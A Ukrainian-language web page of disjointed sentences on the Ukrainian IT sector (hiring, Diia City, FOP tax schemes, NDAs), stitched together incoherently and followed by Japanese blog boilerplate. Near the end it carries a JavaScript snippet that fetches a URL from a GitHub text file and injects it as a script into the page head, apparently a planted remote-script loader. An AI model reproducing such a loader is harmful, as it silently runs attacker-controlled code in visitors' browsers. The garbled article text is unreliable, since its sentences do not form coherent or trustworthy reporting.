IT розповів про

Представники It-кластеру Розповіли Математикам Ужну Про Перспективи В Індустрії Медіацентр

Наші рішення у сфері навігації й картографії використовуються в сотнях мільйонів автомобілів, які їздять по дорогах всього світу. Також вони використовуються в таких системах, як Facebook подробиці на нашому сайті чи Alibaba, де картографічні рішення створені на основі розробок Intellias, які замовив нам наш клієнт HERE Technologies. Зараз для IT-компанії не так важливо, де перебуває програміст.

Якщо в умовах перевірок та іншого тиску бізнеси, які працюють за схемою з ФОПами, змушені будуть створювати юридичні особи — звісно, це негативно відіб’ється на їхніх доходах. Цей договір має бути письмовим і відплатним або не відплатним — за домовленістю між сторонами. Також NDA може передбачати виплату компенсації, якщо якась зі сторін його порушить. “Багато студентів, які приходять до нас, навіть з відомих вишів, можуть бути неготовими. Якось у деяких вийшло, що вони їх закінчили, але приходять, і ти розумієш, що їм зовсім бракує знань”.

За словами Васюка, в Україні 307 тисяч ІТ-спеціалістів включно з жінками. Про це в інтерв’ю ЕП розповів виконавчий директор Асоціації IT Ukraine Костянтин Васюк. Особливо закликає громадян, не їздити в комендантську годину та дотримуватися правил перетину блокпостів. Айтішник говорить, що чув, що війна настає ще вночі на 24 лютого.

Це зменшить ризики стати об’єктом постійних візитів і претензій через перевірки з боку різних держорганів. Отже, бізнес у межах Дія City поступово буде переходити до більш активного залучення фахівців як найманих працівників та гіг-спеціалістів. Щоб вступити до Дія City, уповноважений представник компанії має подати до уповноваженого органу заяву про набуття статусу резидента Дія City.

Нагадую, що стартапи можуть не подавати аудиторський висновок, якщо уповноважений орган після первинної перевірки не має питань щодо відповідності поданих даних реальній картині. “Існує велика кількість охочих, які б хотіли змінити своє становище, перейти до сфери IT, більш високооплачуваної та стабільної роботи. Не всі на це здатні, не всі це розуміють”, – каже вона. “Майже усі ІТ-компанії залучають на роботу студентів, конкуренція дуже висока, кожен студент важливий. В Україні зараз ринок кандидатів, вони обирають компанії”, – пояснюють у компанії. Головний операційний директор компанії Артем Копанєв розповідає, що зараз доводиться полювати за талантами, але критерії працевлаштування не послаблюють. “Багато компаній працюють з іноземними клієнтами. Це дуже великий бар’єр, коли людина приходить, а в неї англійська мова на нулі. У нас інтерн має знати хоча б на рівні pre-intermediate”, – зазначає він. “Програмування – це біль та страждання, – вважає Микола. – Але якщо зможеш кайфувати від цього процесу – тоді це твоє. Якщо є бажання, треба спробувати і протриматися хоча б три місяці, якщо не сподобається – йти звідти”.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

この記事が気に入ったら
いいね または フォローしてね!

コメント

コメントする

目次